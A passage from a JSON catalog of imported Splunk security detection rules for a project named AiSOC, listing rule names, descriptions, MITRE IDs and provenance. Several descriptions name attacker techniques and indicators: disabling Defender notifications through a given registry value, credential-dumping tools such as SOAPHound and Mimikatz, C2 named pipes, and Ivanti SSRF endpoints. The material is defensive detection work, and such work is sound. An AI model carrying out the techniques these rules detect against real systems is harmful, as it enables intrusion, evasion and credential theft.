identify potentially suspicious changes that may be part of an attack, such as enabling dangerous features or modifying security-relevant settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-configuration-option-hunt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8dc9efd5-805a-460e-889e-bc79e5477af9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_configuration_option_hunt.yml" } }, { "id": "splunk-security-content-8dd73f89-682d-444c-8b41-8e679966ad3c", "type": "detection", "name": "Windows System Script Proxy Execution Syncappvpublishingserver", "description": "The following analytic detects the execution of Syncappvpublishingserver.vbs via wscript.exe or cscript.exe, which may indicate an attempt to download remote files or perform privilege escalation. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. Monitoring this activity is crucial as it can signify malicious use of a native Windows script for unauthorized actions. If confirmed malicious, this behavior could lead to unauthorized file downloads or elevated privileges, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-script-proxy-execution-syncappvpublishingserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8dd73f89-682d-444c-8b41-8e679966ad3c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_script_proxy_execution_syncappvpublishingserver.yml" } }, { "id": "splunk-security-content-8e204dfd-cae0-4ea8-a61d-e972a1ff2ff8", "type": "detection", "name": "Malicious Powershell Executed As A Service", "description": "The following analytic identifies the execution of malicious PowerShell commands or payloads via the Windows SC.exe utility. It detects this activity by analyzing Windows System logs (EventCode 7045) and filtering for specific PowerShell-related patterns in the ImagePath field. This behavior is significant because it indicates potential abuse of the Windows Service Control Manager to run unauthorized or harmful scripts, which could lead to system compromise. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/malicious-powershell-executed-as-a-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e204dfd-cae0-4ea8-a61d-e972a1ff2ff8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/malicious_powershell_executed_as_a_service.yml" } }, { "id": "splunk-security-content-8e207707-ad40-4eb3-b865-3a52aec91f26", "type": "detection", "name": "Windows Modify Registry Disable WinDefender Notifications", "description": "The following analytic detects a suspicious registry modification aimed at disabling Windows Defender notifications. It leverages data from the Endpoint.Registry data model, specifically looking for changes to the registry path \"*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\Notifications\\\\DisableNotifications\" with a value of \"0x00000001\". This activity is significant as it indicates an attempt to evade detection by disabling security alerts, a technique used by adversaries and malware like RedLine Stealer. If confirmed malicious, this could allow attackers to operate undetected, increasing the risk of further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disable-windefender-notifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e207707-ad40-4eb3-b865-3a52aec91f26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disable_windefender_notifications.yml" } }, { "id": "splunk-security-content-8e454f64-4bd6-45e6-8a94-1b482593d721", "type": "detection", "name": "GitHub Organizations Delete Branch Ruleset", "description": "The following analytic detects when branch rulesets are deleted in GitHub Organizations. The detection monitors GitHub Organizations audit logs for branch ruleset deletion events by tracking actor details, repository information, and associated metadata. For a SOC, identifying deleted branch rulesets is critical as it could indicate attempts to bypass code review requirements and security controls. Branch rulesets are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-delete-branch-ruleset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e454f64-4bd6-45e6-8a94-1b482593d721", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_delete_branch_ruleset.yml" } }, { "id": "splunk-security-content-8e53f839-e127-4d6d-a54d-a2f67044a57f", "type": "detection", "name": "Windows SOAPHound Binary Execution", "description": "The following analytic detects the execution of the SOAPHound binary (`soaphound.exe`) with specific command-line arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line arguments, and other process-related metadata. This activity is significant because SOAPHound is a known tool used for credential dumping and other malicious activities. If confirmed malicious, this behavior could allow an attacker to extract sensitive information, escalate privileges, or persist within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-soaphound-binary-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e53f839-e127-4d6d-a54d-a2f67044a57f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_soaphound_binary_execution.yml" } }, { "id": "splunk-security-content-8e6ca490-7af3-4299-9a24-39fb69759925", "type": "detection", "name": "Ivanti Connect Secure SSRF in SAML Component", "description": "The following analytic identifies POST requests targeting endpoints vulnerable to the SSRF issue (CVE-2024-21893) in Ivanti's products. It leverages the Web data model, focusing on endpoints such as /dana-ws/saml20.ws, /dana-ws/saml.ws, /dana-ws/samlecp.ws, and /dana-na/auth/saml-logout.cgi. The detection filters for POST requests that received an HTTP 200 OK response, indicating successful execution. This activity is significant as it may indicate an attempt to exploit SSRF vulnerabilities, potentially allowing attackers to access internal services or sensitive data. If confirmed malicious, this could lead to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-ssrf-in-saml-component.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e6ca490-7af3-4299-9a24-39fb69759925", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_ssrf_in_saml_component.yml" } }, { "id": "splunk-security-content-8e897153-2ebd-4cb2-85d3-09ad57db2fb7", "type": "detection", "name": "Windows AD Dangerous Deny ACL Modification", "description": "This detection identifies an Active Directory access-control list (ACL) modification event, which applies permissions that deny the ability to enumerate permissions of the object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dangerous-deny-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e897153-2ebd-4cb2-85d3-09ad57db2fb7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dangerous_deny_acl_modification.yml" } }, { "id": "splunk-security-content-8e99f89e-ae58-4ebc-bf52-ae0b1a277e72", "type": "detection", "name": "System Information Discovery Detection", "description": "The following analytic identifies system information discovery techniques, such as the execution of commands like `wmic qfe`, `systeminfo`, and `hostname`. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs. This activity is significant because attackers often use these commands to gather system configuration details, which can aid in further exploitation. If confirmed malicious, this behavior could allow attackers to tailor their attacks based on the discovered system information, potentially leading to privilege escalation, persistence, or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/system-information-discovery-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8e99f89e-ae58-4ebc-bf52-ae0b1a277e72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/system_information_discovery_detection.yml" } }, { "id": "splunk-security-content-8eb3e858-18d3-44a4-a514-52cfa39f154a", "type": "detection", "name": "Linux Auditd Service Restarted", "description": "The following analytic detects the restarting or re-enabling of services on Linux systems using the `systemctl` or `service` commands. It leverages data from Linux Auditd, focusing on process and command-line execution logs. This activity is significant as adversaries may use it to maintain persistence or execute unauthorized actions. If confirmed malicious, this behavior could lead to repeated execution of malicious payloads, unauthorized access, or data destruction. Security analysts should investigate these events to mitigate risks and prevent further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-service-restarted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8eb3e858-18d3-44a4-a514-52cfa39f154a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_service_restarted.yml" } }, { "id": "splunk-security-content-8ed523ac-276b-11ec-ac39-acde48001122", "type": "detection", "name": "ETW Registry Disabled", "description": "The following analytic detects a registry modification that disables the ETW for the .NET Framework. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the ETWEnabled registry value under the .NETFramework path. This activity is significant because disabling ETW can allow attackers to evade Endpoint Detection and Response (EDR) tools and hide their execution from audit logs. If confirmed malicious, this action could enable attackers to operate undetected, potentially leading to further compromise and persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127", "T1562.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/etw-registry-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ed523ac-276b-11ec-ac39-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/etw_registry_disabled.yml" } }, { "id": "splunk-security-content-8ef3971e-00f2-11ec-b54f-acde48001122", "type": "detection", "name": "Gsuite Email Suspicious Subject With Attachment", "description": "The following analytic identifies Gsuite emails with suspicious subjects and attachments commonly used in spear phishing attacks. It leverages Gsuite email logs, focusing on specific keywords in the subject line and known malicious file types in attachments. This activity is significant for a SOC as spear phishing is a prevalent method for initial compromise, often leading to further malicious actions. If confirmed malicious, this activity could result in unauthorized access, data exfiltration, or further malware deployment, posing a significant risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-suspicious-subject-with-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ef3971e-00f2-11ec-b54f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_suspicious_subject_with_attachment.yml" } }, { "id": "splunk-security-content-8f2c4e9a-5d3b-4c7e-9a1f-6e8d5b2c3a9f", "type": "detection", "name": "Cisco ASA - AAA Policy Tampering", "description": "This analytic detects modifications to authentication and authorization (AAA) security policies on Cisco ASA devices via CLI or ASDM.\nAAA policies control critical security mechanisms including authentication attempts, lockout thresholds, password policies, and access control settings that protect administrative access to network infrastructure.\nAdversaries or malicious insiders may weaken authentication policies to facilitate brute force attacks, disable account lockouts to enable unlimited password attempts, reduce password complexity requirements, or modify authorization settings to elevate privileges and maintain persistent access.\nThe detection monitors for command execution events containing AAA-related commands such as `aaa authentication`, `aaa authorization`, or `aaa local authentication`, focusing on changes to authentication attempts, lockout policies, and access control configurations.\nInvestigate any unauthorized modifications to AAA policies, especially changes that weaken security posture (increasing max-fail attempts, disabling lockouts, reducing password requirements), and verify these changes against approved change management processes and security policies.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-aaa-policy-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f2c4e9a-5d3b-4c7e-9a1f-6e8d5b2c3a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___aaa_policy_tampering.yml" } }, { "id": "splunk-security-content-8f3a614f-6b98-4f7d-82dd-d0df38452a8b", "type": "detection", "name": "Windows Excessive Service Stop Attempt", "description": "The following analytic detects multiple attempts to stop or delete services on a system using `net.exe` or `sc.exe`. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line executions within a one-minute window. This activity is significant as it may indicate an adversary attempting to disable security or critical services to evade detection and further their objectives. If confirmed malicious, this could lead to the attacker gaining persistence, escalating privileges, or disrupting essential services, thereby compromising the system's security posture.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-excessive-service-stop-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f3a614f-6b98-4f7d-82dd-d0df38452a8b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_excessive_service_stop_attempt.yml" } }, { "id": "splunk-security-content-8f45fcf0-5b68-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect mshta renamed", "description": "The following analytic identifies instances where mshta.exe has been renamed and executed. It leverages Endpoint Detection and Response (EDR) data, specifically focusing on the original file name field to detect discrepancies. This activity is significant because renaming mshta.exe is a common tactic used by attackers to evade detection and execute malicious scripts. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to system compromise, data exfiltration, or further lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-mshta-renamed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8f45fcf0-5b68-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_mshta_renamed.yml" } }, { "id": "splunk-security-content-8fa2a0f0-acd9-11eb-8994-acde48001122", "type": "detection", "name": "Excessive Attempt To Disable Services", "description": "The following analytic identifies a suspicious series of command-line executions attempting to disable multiple services. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes where \"sc.exe\" is used with parameters like \"config\" or \"Disabled\" within a short time frame. This activity is significant as it may indicate an adversary's attempt to disable security or other critical services to further compromise the system. If confirmed malicious, this could lead to the attacker achieving persistence, evading detection, or disabling security mechanisms, thereby increasing the risk of further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/excessive-attempt-to-disable-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fa2a0f0-acd9-11eb-8994-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/excessive_attempt_to_disable_services.yml" } }, { "id": "splunk-security-content-8fa891f7-a533-4b3c-af85-5aa2e7c1f1eb", "type": "detection", "name": "Large Volume of DNS ANY Queries", "description": "The following analytic identifies a large volume of DNS ANY queries, which may indicate a DNS amplification attack. It leverages the Network_Resolution data model to count DNS queries of type \"ANY\" directed to specific destinations. This activity is significant because DNS amplification attacks can overwhelm network resources, leading to Denial of Service (DoS) conditions. If confirmed malicious, this activity could disrupt services, degrade network performance, and potentially be part of a larger Distributed Denial of Service (DDoS) attack, impacting the availability of critical infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1498.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/large-volume-of-dns-any-queries.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fa891f7-a533-4b3c-af85-5aa2e7c1f1eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/large_volume_of_dns_any_queries.yml" } }, { "id": "splunk-security-content-8fbd2e88-4ea5-40b9-9217-fd0855e08cc0", "type": "detection", "name": "Windows Remote Services Rdp Enable", "description": "The following analytic detects modifications in the Windows registry to enable Remote Desktop Protocol (RDP) on a targeted machine. It leverages data from the Endpoint.Registry datamodel, specifically monitoring changes to the \"fDenyTSConnections\" registry value. This activity is significant as enabling RDP via registry is uncommon and often associated with adversaries or malware attempting to gain remote access. If confirmed malicious, this could allow attackers to remotely control the compromised host, potentially leading to further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-services-rdp-enable.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fbd2e88-4ea5-40b9-9217-fd0855e08cc0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_services_rdp_enable.yml" } }, { "id": "splunk-security-content-8fdb41ad-091c-4d7a-af1d-9123fe94b539", "type": "detection", "name": "Web or Application Server Spawning a Shell", "description": "The following analytic detects instances where Java, or Tomcat\nprocesses spawn a Linux shell, which may indicate exploitation attempts, such as\nthose related to CVE-2021-44228 (Log4Shell). This detection leverages Endpoint Detection\nand Response (EDR) telemetry, focusing on process names and parent-child process\nrelationships. This activity is significant as it can signify a compromised Java\napplication, potentially leading to unauthorized shell access. If confirmed malicious,\nattackers could execute arbitrary commands, escalate privileges, or maintain persistent\naccess, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/web-or-application-server-spawning-a-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8fdb41ad-091c-4d7a-af1d-9123fe94b539", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/web_or_application_server_spawning_a_shell.yml" } }, { "id": "splunk-security-content-90080fa6-a8df-11eb-91e4-acde48001122", "type": "detection", "name": "XMRIG Driver Loaded", "description": "The following analytic detects the installation of the XMRIG coinminer driver on a system. It identifies the loading of the `WinRing0x64.sys` driver, commonly associated with XMRIG, by analyzing Sysmon EventCode 6 logs for specific signatures and image loads. This activity is significant because XMRIG is an open-source CPU miner frequently exploited by adversaries to mine cryptocurrency illicitly. If confirmed malicious, this activity could lead to unauthorized resource consumption, degraded system performance, and potential financial loss due to unauthorized cryptocurrency mining.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/xmrig-driver-loaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90080fa6-a8df-11eb-91e4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/xmrig_driver_loaded.yml" } }, { "id": "splunk-security-content-9015385a-9c84-11eb-bef2-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate From Process", "description": "The following analytic detects a source process failing to authenticate with 30 unique users, indicating a potential Password Spraying attack. It leverages Windows Event 4625 with Logon Type 2, collected from domain controllers, member servers, and workstations. This activity is significant as it may represent an adversary attempting to gain initial access or elevate privileges within an Active Directory environment. If confirmed malicious, this could lead to unauthorized access, privilege escalation, or further compromise of the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-from-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9015385a-9c84-11eb-bef2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_from_process.yml" } }, { "id": "splunk-security-content-9029b575-6f6b-4ab1-b660-67b24b7e9c3d", "type": "detection", "name": "Windows Kerberos Coercion via DNS", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. This detection leverages Windows Security Event Codes 5136, 5137, 4662, looking for DNS events with specific CREDENTIAL_TARGET_INFORMATION entries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.004", "T1557.001", "T1187" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-kerberos-coercion-via-dns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "9029b575-6f6b-4ab1-b660-67b24b7e9c3d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_kerberos_coercion_via_dns.yml" } }, { "id": "splunk-security-content-90599d85-dc2a-4d4c-8c59-9485c3665828", "type": "detection", "name": "Windows Suspicious C2 Named Pipe", "description": "The following analytic detects the creation or connection to known suspicious C2 named pipes.\nIt leverages Sysmon EventCodes 17 and 18 to identify known default pipe names used by C2 tools.\nIf confirmed malicious, this could allow an attacker to abuse these to potentially gain persistence, command and control, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1559", "T1021.002", "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-c2-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "90599d85-dc2a-4d4c-8c59-9485c3665828", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_c2_named_pipe.yml" } }, { "id": "splunk-security-content-905d5692-6d7c-432f-bc7e-a6b4f464d40e", "type": "detection", "name": "Windows Steal Authentication Certificates CryptoAPI", "description": "The following analytic detects the extraction of authentication certificates using Windows Event Log - CAPI2 (CryptoAPI 2). It leverages EventID 70, which is generated when a certificate's private key is acquired. This detection is significant because it can identify potential misuse of certificates, such as those extracted by tools like Mimikatz or Cobalt Strike. If confirmed malicious, this activity could allow attackers to impersonate users, escalate privileges, or access sensitive information, posing a severe risk to the organization's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-steal-authentication-certificates-cryptoapi.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "905d5692-6d7c-432f-bc7e-a6b4f464d40e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_steal_authentication_certificates_cryptoapi.yml" } }, { "id": "splunk-security-content-907ac95c-4dd9-11ec-ba2c-acde48001122", "type": "detection", "name": "Powershell Windows Defender Exclusion Commands", "description": "The following analytic detects the use of PowerShell commands to add or set Windows Defender exclusions. It leverages EventCode 4104 to identify suspicious `Add-MpPreference` or `Set-MpPreference` commands with exclusion parameters. This activity is significant because 